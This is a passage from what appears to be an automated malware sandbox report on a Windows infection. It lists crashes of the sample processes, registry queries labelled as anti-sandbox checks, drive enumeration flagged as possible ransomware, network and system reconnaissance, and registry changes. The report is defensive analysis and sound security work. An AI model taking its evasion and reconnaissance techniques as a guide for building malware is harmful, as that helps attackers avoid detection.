C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\msil_system.core_b77a5c561934e089_10.0.19041.1_none_f7ab015e354efaf9\System.Core.dll TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\5aefe6d49bd6034b816537f0c4a82056.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\649e68bbc340ae4aa7ce95c90307c503.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_netfx-system.configuration.install_b03f5f7f11d50a3a_10.0.19041.1_none_e76884dfd0faa7b7.manifest TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\56cfc0e975472542a65669f7fbefc96f.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\537cedf14ff64849bb030c4be4cc2a33.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\msil_microsoft.build.utilities_b03f5f7f11d50a3a_10.0.19041.1_none_a2f212cc3604dbb4\Microsoft.Build.Utilities.dll TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_netfx-aspnet_webadmin_locres_res_b03f5f7f11d50a3a_10.0.19041.1_none_5a16ab44a4e3fc00\WebAdminHelp_Internals.aspx.resx TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_wpf-presentationnative_31bf3856ad364e35_10.0.19041.1_none_0cb7195de5ddcf63.manifest TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\545242dd1b422b42b3c359b7ed8a7336.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\x86_netfx-mscordacwks_b03f5f7f11d50a3a_10.0.19041.1_none_ec0a14b497e3e666.manifest TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\5c6997e34c14b740a54221dda846e338.tmp TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 26 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5068 3448 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 5072 3448 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 5164 1664 WerFault.exe rundll32.exe 5388 1484 WerFault.exe 620ee9f8079d0_Fri009b6e1f0f0.exe 5620 3448 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 6108 3448 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 5116 3448 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 6132 3448 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 4364 5320 WerFault.exe 5216484602.exe 5656 5320 WerFault.exe 5216484602.exe 532 5740 WerFault.exe 2172678247.exe 1768 5320 WerFault.exe 5216484602.exe 4816 3448 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 5940 3448 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 5768 5320 WerFault.exe 5216484602.exe 5420 3448 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 5200 5320 WerFault.exe 5216484602.exe 5496 3672 WerFault.exe explorer.exe 3412 2736 WerFault.exe DllHost.exe 5940 5780 WerFault.exe DllHost.exe 5860 2632 WerFault.exe DllHost.exe 5476 5892 WerFault.exe DllHost.exe 3988 2000 WerFault.exe DllHost.exe 5964 5596 WerFault.exe 2304 3832 WerFault.exe 4644 1256 WerFault.exe usaewdb -
Checks SCSI registry key(s) 3 TTPs 11 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
42ED.execacls.exevssvc.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 42ED.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cacls.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cacls.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000002b5b8d01cc3769600000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800002b5b8d010000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff0000000007000100006809002b5b8d01000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000002b5b8d0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000002b5b8d0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 42ED.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 42ED.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exerundll32.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exe4E49.exeMusNotifyIcon.execmd.exeWerFault.exea3ffcc91-8a0c-4a12-89a1-6c8faa676d4c.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 rundll32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz cmd.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 4E49.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MusNotifyIcon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MusNotifyIcon.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier a3ffcc91-8a0c-4a12-89a1-6c8faa676d4c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 a3ffcc91-8a0c-4a12-89a1-6c8faa676d4c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 4E49.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 6104 timeout.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 46 IoCs
Processes:
cmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exerundll32.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU rundll32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exeNETSTAT.EXENETSTAT.EXEpid process 4024 ipconfig.exe 3144 ipconfig.exe 3696 NETSTAT.EXE 5528 NETSTAT.EXE -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 5856 taskkill.exe 1360 taskkill.exe -
Processes:
cacls.exeiexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\IESettingSync cacls.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2009943977" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2009943977" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cce5a29beacafa47833fc2d72883fdda0000000002000000000010660000000100002000000065b13024560d253144a54cc1c27b26cb48dfff79e0ab53884332d484ab7acb8a000000000e8000000002000020000000f7863fdd4cd69b3a0658b27756ecefdf166ba3c2474335965e88f33325e2257420000000feabe2d094203df14e4d86acc4dbf613ad804a459e04398b224fe2c378ce184a400000008468916572a56ea48ab767563187e949f390c34a6a8de7f3c4f8f360c01f1f696bc1a8319c42e45bc5173257e2f74499a71474920f4872fd7a68d08059e2b560 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cce5a29beacafa47833fc2d72883fdda0000000002000000000010660000000100002000000003f7e50e3da205b3b1dde29fcf819817b3eddb509ca0dfbb8fe71d0076ea17c0000000000e8000000002000020000000d523ea0d4937e2ae250a65def39fdf668a384ba2e9b7a182fb4a073da8c6afa920000000d8824bab0d3dca60899d2695a8a94e254c7820de3a71380988b1a4ddee9357a24000000095bd9f56dfcc3070c1e2863e12974c645e896fdce5a76563fc6364b8878ae22f9ad42cf79b0b3f7e378dd013a68fa4718787be4bf5680bdeca932b96c86fb7ab iexplore.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch cacls.exe Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60e7507a6c24d801 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" cacls.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" cacls.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main Set value (data) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 5013587a6c24d801 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30942316" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30942316" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2019162678" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{A320C456-905F-11EC-82D0-4E47EAE21280} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30942316" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "5.393598" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.220751" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4216" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.655823" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "2" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "917753" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization svchost.exe Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" svchost.exe Set value (int) 